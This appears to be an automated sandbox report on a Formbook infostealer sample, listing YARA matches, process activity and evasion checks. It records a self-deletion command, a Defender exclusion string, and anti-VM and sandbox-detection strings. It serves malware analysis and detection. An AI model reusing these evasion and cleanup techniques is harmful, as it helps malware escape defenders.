          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: s6G3ZtvHZg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@16/9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\s6G3ZtvHZg.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeMutant created: \Sessions\1\BaseNamedObjects\kkigloYTgmEpnQoD
          Source: s6G3ZtvHZg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: s6G3ZtvHZg.exeVirustotal: Detection: 27%
          Source: s6G3ZtvHZg.exeReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: s6G3ZtvHZg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: s6G3ZtvHZg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: s6G3ZtvHZg.exe, 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, help.exe, 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: s6G3ZtvHZg.exe, help.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_00C804D0 push C03300AFh; ret
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004152F5 push esi; retf
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041536A push esi; retf
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0178D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A52F5 push esi; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A536A push esi; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB3FB push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB45C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ABDAE push esp; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94799509268
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: s6G3ZtvHZg.exe PID: 6076, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000003985E4 second address: 00000000003985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000039896E second address: 0000000000398974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6092Thread sleep time: -104796s >= -30000s
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2148Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 1528Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread delayed: delay time: 104796
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000002.522445259.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.272267558.00000000069D9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01750050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01750050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01804015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01804015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01801074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01763B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01763B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173DB60 mov ecx, dword ptr fs:[00000030h]
